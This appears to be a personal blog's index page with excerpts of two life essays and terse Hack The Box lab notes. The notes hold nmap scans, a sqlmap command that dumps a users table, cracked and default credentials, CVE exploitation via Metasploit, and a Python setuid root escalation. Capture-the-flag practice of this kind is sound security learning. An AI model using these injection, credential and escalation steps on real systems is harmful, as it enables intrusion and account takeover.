Hi there 👋

Become so very free that your whole existence is an act of rebellion. -Albert Camus What do you mean fix the way you write? For all my life I have held my pen the wrong way while I write. This is an incredibly hard topic to understand without some visuals, so let’s get on that. You see how this person rests the pencil on their middle finder while using their index and thumb to stabilize the pencil? Well, I didn’t use to do that. asdfasdfasdf This is how I used to hold it. ...

There is no shortcut to any place worth going. -Beverly Sills Introduction Your feed is being spoon-fed to you. You are swallowing whatever the newest social media is trying to serve you. The idea of a home page and for you has moved away from friends, people you know or authors you remember the name of. Your feed is no longer yours. How I have lived my life A Gen-Z, youtube homepage pioneer. ...

nmap: 22 and 80 webserver redirects to http://monitorsthree.htb/ has /login.php and /forgot_password.php forgot password.php is vuln for sqli. sqlmap -u “http://monitorsthree.htb/forgot_password.php” -T users -C password –dump –form gives 31a181c8372e3afc59dab863430610e8 crackstation has it for greencacti2001 u can ofc use john/hashcat as it’s probably in the rockyou.txt discovery. vhost enum gives us this url: http://cacti.monitorsthree.htb/ admin:greencacti2001 login works here CVE-2024-25641

tomcat [+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret

PORT STATE SERVICE 3632/tcp open distccd | distcc-cve2004-2687: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 | https://nvd.nist.gov/vuln/detail/CVE-2004-2687 |_ ht ...

PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds fuckin metasploit igjen

nmap PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (work group: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -19m56s, deviation: 34m35s, median: 1s | smb2-time: | date: 2024-09-25T13:42:29 |_ start_date: 2024-09-25T13:35:32 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2:1:0: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-09-25T14:42:32+01:00 EternalBlue: used metasploit :3 ...

Nmap PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) PORT STATE SERVICE VERSION 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Welcome to GreenHorn ! - GreenHorn |_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn | http-robots.txt: 2 disallowed entries |_/data/ /docs/ |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-generator: pluck 4.7.18 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 3000/tcp open http syn-ack Golang net/http server | http-methods: |_ Supported Methods: HEAD GET |_http-title: GreenHorn |_http-favicon: Unknown favicon MD5: F6E1A9128148EEAD9EFF823C540EF471 | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=9dde25bb34774b6e; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=L1FMXiQMBOazVBXAI0MQ_jt91JY6MTcyNzI2NjcyNzcyOTgyODMwNA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Wed, 25 Sep 2024 12:18:47 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-auto"> | <head> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <title>GreenHorn</title> | <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNv bnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=5a3169f8726bd7f7; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=IPBxo2WJPuZlkEaLIfsjqxCh3jg6MTcyNzI2NjcyNzkxNDI0Mzk4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Wed, 25 Sep 2024 12:18:47 GMT |_ Content-Length: 0 8000/tcp open http-alt? syn-ack Robots.txt: ...

Nmap PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH0dV4gtJNo8ixEEBDxhUId6Pc/8iNLX16+zpUCIgmxxl5TivDMLg2JvXorp4F2r8ci44CESUlnMHRSYNtlLttiIZHpTML7ktFHbNexvOAJqE1lIlQlGjWBU1hWq6Y6n1tuUANOd5U+Yc0 /h53gKu5nXTQTy1c9CLbQfaYvFjnzrR3NQ6Hw7ih5u3mEjJngP+Sq+dpzUcnFe1BekvBPrxdAJwN6w+MSpGFyQSAkUthrOE4JRnpa6jSsTjXODDjioNkp2NLkKa73Yc2DHk3evNUXfa+P8oWFBk8ZXSHFyeOoNkcqkPCrkevB71NdFtn3Fd/Ar 07co0ygw90Vb2q34cu1Jo/1oPV1UFsvcwaKJuxBKozH+VA0F9hyriPKjsvTRCbkFjweLxCib5phagHu6K5KEYC+VmWbCUnWyvYZauJ1/t5xQqqi9UWssRjbE1mI0Krq2Zb97qnONhzcclAPVpvEVdCCcl0rYZjQt6VI1PzHha56JepZCFCNvX3 FVxYzEk= | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK7G5PgPkbp1awVqM5uOpMJ/xVrNirmwIT21bMG/+jihUY8rOXxSbidRfC9KgvSDC4flMsPZUrWziSuBDJAra5g= | 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILHj/lr3X40pR3k9+uYJk4oSjdULCK0DlOxbiL66ZRWg 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

USER nathan PASS Buck3tH4TF0RM3! Priv esq: Python has the capability of using setuid as the owner of the group (root), so if you run python as Nathan (non-root) you can import os and run os.setuid(0) to get the uid of root. Then you can run bash as root with os.system("/bin/bash").